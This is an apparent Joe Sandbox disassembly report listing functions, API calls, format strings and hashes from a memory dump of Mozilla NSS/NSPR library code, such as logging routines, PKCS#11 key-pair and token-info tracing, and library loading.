Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 479b8d2f213f65b1b536ab0ea025c35109ca1eff46ca7d7c516c56307c097544
Instruction ID: aa92f20ca7f74aeb31b708222657063b3b12009b50f150ed9093629ef7feed1d
Opcode Fuzzy Hash: 479b8d2f213f65b1b536ab0ea025c35109ca1eff46ca7d7c516c56307c097544
Instruction Fuzzy Hash: 7CD16571F092168FDB44CEADC4806AEB7F2FB8D305F16852AC555E7A60D7309D41CB98

Function 6C648EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b011004774ae4f64b7820e833c014aefd2f0e05aa79d2df4e1272aace504254
Instruction ID: 1622172d4f9a442df465402b08bf12ee4b63b1d0d06476e9604433c7a7e18970
Opcode Fuzzy Hash: 3b011004774ae4f64b7820e833c014aefd2f0e05aa79d2df4e1272aace504254
Instruction Fuzzy Hash: EE11E232A002198BD704CF15D884B9AB7A5BF4A358F04C2BAD805CFA61C375D882C7C9

Function 6C720C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b16a20dbcd1b67cf362bbdb215fbff8809e7d4820699392cf4426b80bb987e5a
Instruction ID: 979fcc01a80d88852cbda04af60db50f49e0b067493dd87dd6010ba0e473dd42
Opcode Fuzzy Hash: b16a20dbcd1b67cf362bbdb215fbff8809e7d4820699392cf4426b80bb987e5a
Instruction Fuzzy Hash: 2311BFB46043058FCB00DF18C8946AA7BA5EF85368F148079D8198B701DB35E846CBA0

Function 6C720D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 73bb9faebba6c6434ab638d4f21b3fee4919f997bcf2fe20e68cc85889a39d4e
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 0CE0923A243058A7DB148E09C565AA97359DF81619FB4807DCC5D9FE01D737F90387A1

Function 6C64CC60 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd8ed1a5f317b962664189ed7dc48a6667c4dc93a4e7d7967595ea2aa61a208a
Instruction ID: 5b601a91b7cd2a313a955e25909f9f71cfaa64f274997cbc46c2e2b6dcc15226
Opcode Fuzzy Hash: cd8ed1a5f317b962664189ed7dc48a6667c4dc93a4e7d7967595ea2aa61a208a
Instruction Fuzzy Hash: F9C04838244608CFC704DE08E499DA43BA8AB0961070400A4EA028B721DA21F800DA84

Function 6C7609D0 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 275filetimethreadCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C760A22

Part of subcall function 6C719DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C760A27), ref: 6C719DC6
Part of subcall function 6C719DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C760A27), ref: 6C719DD1
Part of subcall function 6C719DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C719DED

PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C760A35

Part of subcall function 6C643810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C64382A
Part of subcall function 6C643810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C643879

PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C760A66
PR_GetCurrentThread.NSS3 ref: 6C760A70
PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C760A9D
PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C760AC8
PR_vsmprintf.NSS3(?,?), ref: 6C760AE8
EnterCriticalSection.KERNEL32(?), ref: 6C760B19
OutputDebugStringA.KERNEL32(00000000), ref: 6C760B48
OutputDebugStringA.KERNEL32(?), ref: 6C760B88
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C760C36
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760C45
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C760C5D
_PR_MD_UNLOCK.NSS3(?), ref: 6C760C76
PR_LogFlush.NSS3 ref: 6C760C7E
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C760C8D
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760C9C
OutputDebugStringA.KERNEL32(?), ref: 6C760CD1
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C760CEC
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760CFB
OutputDebugStringA.KERNEL32(00000000), ref: 6C760D16
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C760D26
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760D35
OutputDebugStringA.KERNEL32(0000000A), ref: 6C760D65
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C760D70
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760D7E
_PR_MD_UNLOCK.NSS3(?), ref: 6C760D90
free.MOZGLUE(00000000), ref: 6C760D99

Strings

%ld[%p]: , xrefs: 6C760A96
%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - , xrefs: 6C760A5B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: DebugOutputStringfflush$Timefwrite$Unothrow_t@std@@@__ehfuncinfo$??2@$R_snprintfSystem$CriticalCurrentEnterExplodeFileFlushR_vsmprintfR_vsnprintfSectionThreadfputcfreememcpy
String ID: %04d-%02d-%02d %02d:%02d:%02d.%06d UTC - $%ld[%p]:
API String ID: 3820836880-2800039365
Opcode ID: 8214f52ced6b5d0f8bc6dfa9430f121a6257730d9c1f4af90a2cf2fe57e804cc
Instruction ID: 982506e44623dd857b3d70d9c58071b448f88cbad8b168785bbf02912741d30c
Opcode Fuzzy Hash: 8214f52ced6b5d0f8bc6dfa9430f121a6257730d9c1f4af90a2cf2fe57e804cc
Instruction Fuzzy Hash: 5EA1F470A04255AFDB109F79DC48FEA3B78AF1231CF0806B4F80993A41EB71A994CB59

Function 6C688BA0 Relevance: 52.7, APIs: 17, Strings: 13, Instructions: 202COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GenerateKeyPair), ref: 6C688BC6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C688BF4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C688C03

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C688C19
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C688C3F
PR_LogPrint.NSS3( pPublicKeyTemplate = 0x%p,?), ref: 6C688C5A
PR_LogPrint.NSS3( ulPublicKeyAttributeCount = %d,?), ref: 6C688C73
PR_LogPrint.NSS3( pPrivateKeyTemplate = 0x%p,?), ref: 6C688C8C
PR_LogPrint.NSS3( ulPrivateKeyAttributeCount = %d,?), ref: 6C688CA7
PR_LogPrint.NSS3( phPublicKey = 0x%p,?), ref: 6C688CC2
PR_LogPrint.NSS3( phPrivateKey = 0x%p,?), ref: 6C688CE7
PL_strncpyz.NSS3(?, *phPublicKey = 0x%x,00000050), ref: 6C688D92
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C688DA1
PR_LogPrint.NSS3(?,00000000), ref: 6C688DB7
PL_strncpyz.NSS3(?, *phPrivateKey = 0x%x,00000050), ref: 6C688DEB
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C688DFA

Part of subcall function 6C640F00: PR_GetPageSize.NSS3(6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F1B
Part of subcall function 6C640F00: PR_NewLogModule.NSS3(clock,6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F25

PR_LogPrint.NSS3(?,00000000), ref: 6C688E10

Strings

(CK_INVALID_HANDLE), xrefs: 6C688BFC, 6C688D9A, 6C688DF3
*phPrivateKey = 0x%x, xrefs: 6C688DD5, 6C688DE5
pMechanism = 0x%p, xrefs: 6C688C3A
phPublicKey = 0x%p, xrefs: 6C688CBD
*phPublicKey = 0x%x, xrefs: 6C688D7C, 6C688D8C
phPrivateKey = 0x%p, xrefs: 6C688CE2
nvl, xrefs: 6C688D19, 6C688D5A
C_GenerateKeyPair, xrefs: 6C688BC1
ulPrivateKeyAttributeCount = %d, xrefs: 6C688CA2
ulPublicKeyAttributeCount = %d, xrefs: 6C688C6E
pPublicKeyTemplate = 0x%p, xrefs: 6C688C55
hSession = 0x%x, xrefs: 6C688BDE, 6C688BEE
pPrivateKeyTemplate = 0x%p, xrefs: 6C688C87

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn$ModulePageSize
String ID: *phPrivateKey = 0x%x$ *phPublicKey = 0x%x$ hSession = 0x%x$ pMechanism = 0x%p$ pPrivateKeyTemplate = 0x%p$ pPublicKeyTemplate = 0x%p$ phPrivateKey = 0x%p$ phPublicKey = 0x%p$ ulPrivateKeyAttributeCount = %d$ ulPublicKeyAttributeCount = %d$ (CK_INVALID_HANDLE)$C_GenerateKeyPair$nvl
API String ID: 510426473-266207982
Opcode ID: ac3f3964212591aad31a566501f48d008b402b8de99df56a36fe064b35538b65
Instruction ID: c89b1c1f164cad3ab78ed53c79f88b1a059e7bf310896f4ece4096237e611dd0
Opcode Fuzzy Hash: ac3f3964212591aad31a566501f48d008b402b8de99df56a36fe064b35538b65
Instruction Fuzzy Hash: 2961C875603104ABDB00CF51DE4CE9A3BB2AB5A35DF044435ED096BB62DB309918CBBE

Function 6C6828A0 Relevance: 50.9, APIs: 12, Strings: 17, Instructions: 155COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetTokenInfo), ref: 6C6828BD
PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6C6828EF

Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(?), ref: 6C760B88
Part of subcall function 6C7609D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C760C5D
Part of subcall function 6C7609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C760C8D
Part of subcall function 6C7609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760C9C
Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(?), ref: 6C760CD1
Part of subcall function 6C7609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C760CEC
Part of subcall function 6C7609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760CFB
Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C760D16
Part of subcall function 6C7609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C760D26
Part of subcall function 6C7609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760D35
Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C760D65
Part of subcall function 6C7609D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C760D70
Part of subcall function 6C7609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C760D90
Part of subcall function 6C7609D0: free.MOZGLUE(00000000), ref: 6C760D99

Part of subcall function 6C640F00: PR_GetPageSize.NSS3(6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F1B
Part of subcall function 6C640F00: PR_NewLogModule.NSS3(clock,6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F25

PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C6828D6

Part of subcall function 6C7609D0: PR_Now.NSS3 ref: 6C760A22
Part of subcall function 6C7609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C760A35
Part of subcall function 6C7609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C760A66
Part of subcall function 6C7609D0: PR_GetCurrentThread.NSS3 ref: 6C760A70
Part of subcall function 6C7609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C760A9D
Part of subcall function 6C7609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C760AC8
Part of subcall function 6C7609D0: PR_vsmprintf.NSS3(?,?), ref: 6C760AE8
Part of subcall function 6C7609D0: EnterCriticalSection.KERNEL32(?), ref: 6C760B19
Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C760B48
Part of subcall function 6C7609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C760C76
Part of subcall function 6C7609D0: PR_LogFlush.NSS3 ref: 6C760C7E

PR_LogPrint.NSS3( label = "%.32s",?), ref: 6C682963
PR_LogPrint.NSS3( manufacturerID = "%.32s",?), ref: 6C682983
PR_LogPrint.NSS3( model = "%.16s",?), ref: 6C6829A3
PR_LogPrint.NSS3( serial = "%.16s",?), ref: 6C6829C3
PR_LogPrint.NSS3( flags = %s %s %s %s,CKF_RNG,CKF_WRITE_PROTECTED,CKF_LOGIN_REQUIRED,?), ref: 6C682A26
PR_LogPrint.NSS3( maxSessions = %u, Sessions = %u,?,?), ref: 6C682A48
PR_LogPrint.NSS3( maxRwSessions = %u, RwSessions = %u,?,?), ref: 6C682A66
PR_LogPrint.NSS3( hardware version: %d.%d,?,?), ref: 6C682A8E
PR_LogPrint.NSS3( firmware version: %d.%d,?,?), ref: 6C682AB6

Strings

CKF_RNG, xrefs: 6C682A13, 6C682A20
label = "%.32s", xrefs: 6C68295E
CKF_WRITE_PROTECTED, xrefs: 6C6829FE, 6C682A1F
firmware version: %d.%d, xrefs: 6C682AB1
nvl, xrefs: 6C68290B, 6C682937
manufacturerID = "%.32s", xrefs: 6C68297E
maxRwSessions = %u, RwSessions = %u, xrefs: 6C682A61
serial = "%.16s", xrefs: 6C6829BE
model = "%.16s", xrefs: 6C68299E
CKF_LOGIN_REQUIRED, xrefs: 6C6829F3, 6C682A1E
C_GetTokenInfo, xrefs: 6C6828B8
pInfo = 0x%p, xrefs: 6C6828EA
slotID = 0x%x, xrefs: 6C6828D1
maxSessions = %u, Sessions = %u, xrefs: 6C682A43
CKF_USER_PIN_INIT, xrefs: 6C6829E5
hardware version: %d.%d, xrefs: 6C682A89
flags = %s %s %s %s, xrefs: 6C682A21

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Print$DebugOutputString$fflushfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushModulePageR_vsmprintfR_vsnprintfSectionSizeThreadTimefputcfreememcpy
String ID: firmware version: %d.%d$ flags = %s %s %s %s$ hardware version: %d.%d$ label = "%.32s"$ manufacturerID = "%.32s"$ maxRwSessions = %u, RwSessions = %u$ maxSessions = %u, Sessions = %u$ model = "%.16s"$ pInfo = 0x%p$ serial = "%.16s"$ slotID = 0x%x$CKF_LOGIN_REQUIRED$CKF_RNG$CKF_USER_PIN_INIT$CKF_WRITE_PROTECTED$C_GetTokenInfo$nvl
API String ID: 2460313690-2571097422
Opcode ID: 966f1a2fbf8215484f3df175e815ce3aebdcc8109961041b830f9be082df426f
Instruction ID: 5c3d50d5e81791d8a769981996f5ec57ccbda85457c3850b2e20e931a084edf3
Opcode Fuzzy Hash: 966f1a2fbf8215484f3df175e815ce3aebdcc8109961041b830f9be082df426f
Instruction Fuzzy Hash: 0D51FCB1502148AFEB108F50DF8DF653BB6AB4230DF458074ED09ABA52DB31D904CB7A

Function 6C666BF0 Relevance: 49.1, APIs: 19, Strings: 9, Instructions: 148COMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(6C7A0148,?,?,?,?,6C666DC2), ref: 6C666BFF
PR_smprintf.NSS3(%s manufacturerID='%s',00000000,?,6C666DC2), ref: 6C666C1C

Part of subcall function 6C63C5E0: free.MOZGLUE(?,?,?,?,00000000,00000001,?,6C641FBD,Unable to create nspr log file '%s',00000000), ref: 6C63C63B

free.MOZGLUE(00000000,?,?,?,6C666DC2), ref: 6C666C27
PR_smprintf.NSS3(%s libraryDescription='%s',00000000,?,6C666DC2), ref: 6C666C45
free.MOZGLUE(00000000,?,?,?,6C666DC2), ref: 6C666C50
PR_smprintf.NSS3(%s cryptoTokenDescription='%s',00000000,?,6C666DC2), ref: 6C666C71
free.MOZGLUE(00000000,?,?,?,6C666DC2), ref: 6C666C7C
PR_smprintf.NSS3(%s dbTokenDescription='%s',00000000,?,6C666DC2), ref: 6C666C9D
free.MOZGLUE(00000000,?,?,?,6C666DC2), ref: 6C666CA8
PR_smprintf.NSS3(%s cryptoSlotDescription='%s',00000000,?,6C666DC2), ref: 6C666CC9
free.MOZGLUE(00000000,?,?,?,6C666DC2), ref: 6C666CD4
PR_smprintf.NSS3(%s dbSlotDescription='%s',00000000,?,6C666DC2), ref: 6C666CF5
free.MOZGLUE(00000000,?,?,?,6C666DC2), ref: 6C666D00
PR_smprintf.NSS3(%s FIPSSlotDescription='%s',00000000,?,6C666DC2), ref: 6C666D1D
free.MOZGLUE(00000000,?,?,?,6C666DC2), ref: 6C666D28
PR_smprintf.NSS3(%s FIPSTokenDescription='%s',00000000,?,6C666DC2), ref: 6C666D45
free.MOZGLUE(00000000,?,?,?,6C666DC2), ref: 6C666D50
PR_smprintf.NSS3(%s minPS=%d,00000000,?,6C666DC2), ref: 6C666D68
free.MOZGLUE(00000000,?,?,?,6C666DC2), ref: 6C666D73

Strings

%s manufacturerID='%s', xrefs: 6C666C17
%s FIPSTokenDescription='%s', xrefs: 6C666D40
%s cryptoSlotDescription='%s', xrefs: 6C666CC4
%s minPS=%d, xrefs: 6C666D63
%s dbTokenDescription='%s', xrefs: 6C666C98
%s dbSlotDescription='%s', xrefs: 6C666CF0
%s FIPSSlotDescription='%s', xrefs: 6C666D18
%s cryptoTokenDescription='%s', xrefs: 6C666C6C
%s libraryDescription='%s', xrefs: 6C666C40

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: R_smprintffree
String ID: %s FIPSSlotDescription='%s'$%s FIPSTokenDescription='%s'$%s cryptoSlotDescription='%s'$%s cryptoTokenDescription='%s'$%s dbSlotDescription='%s'$%s dbTokenDescription='%s'$%s libraryDescription='%s'$%s manufacturerID='%s'$%s minPS=%d
API String ID: 657075589-3414793728
Opcode ID: 1b553b0452e09e245710db7594c037459163e10307232bdc6d57399df3c8c2f2
Instruction ID: e9bf4ab25ee6d32eff768043d06c2985339b026752ad2a2fa49936fe407e9ff1
Opcode Fuzzy Hash: 1b553b0452e09e245710db7594c037459163e10307232bdc6d57399df3c8c2f2
Instruction Fuzzy Hash: 114146B760252137A7106A667C06DBB3959AEC16D87191134FC1ED6F01FA22CD2582FF

Function 6C640AA0 Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 227libraryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C640AD4

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

PR_EnterMonitor.NSS3 ref: 6C640B0D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6C640B2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6C640B54
WideCharToMultiByte.KERNEL32 ref: 6C640B94
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C640BC9
calloc.MOZGLUE(00000001,00000014), ref: 6C640BEA
LoadLibraryExW.KERNEL32(?,00000000,?), ref: 6C640C15

Strings

Loaded library %s (load lib), xrefs: 6C640D6F
error %d, xrefs: 6C640D08

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$EnterErrorLibraryLoadMonitorValuecalloc
String ID: Loaded library %s (load lib)$error %d
API String ID: 2139286163-2368894446
Opcode ID: 959c64b83a46cb55eaf79ece3a4c4e1abf7ee77daf4f6d81816372cf745c1685
Instruction ID: 6a5e507fd0ac997c1b18327ea55cb8a9ad4b048d220991afeef1921b1305d97a
Opcode Fuzzy Hash: 959c64b83a46cb55eaf79ece3a4c4e1abf7ee77daf4f6d81816372cf745c1685
Instruction Fuzzy Hash: 5E712770A04224ABEB109F79DD48BAF76B8EF56319F04C079F809D7640EB319A44CB99

Function 6C68CB70 Relevance: 44.0, APIs: 14, Strings: 11, Instructions: 225fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_OUTPUT_FILE,6C6A444C,00000000,00000000,00000000,?,6C667F7C,6C6680DD), ref: 6C68CB8B

Part of subcall function 6C641240: TlsGetValue.KERNEL32(00000040,?,6C64116C,NSPR_LOG_MODULES), ref: 6C641267
Part of subcall function 6C641240: EnterCriticalSection.KERNEL32(?,?,?,6C64116C,NSPR_LOG_MODULES), ref: 6C64127C
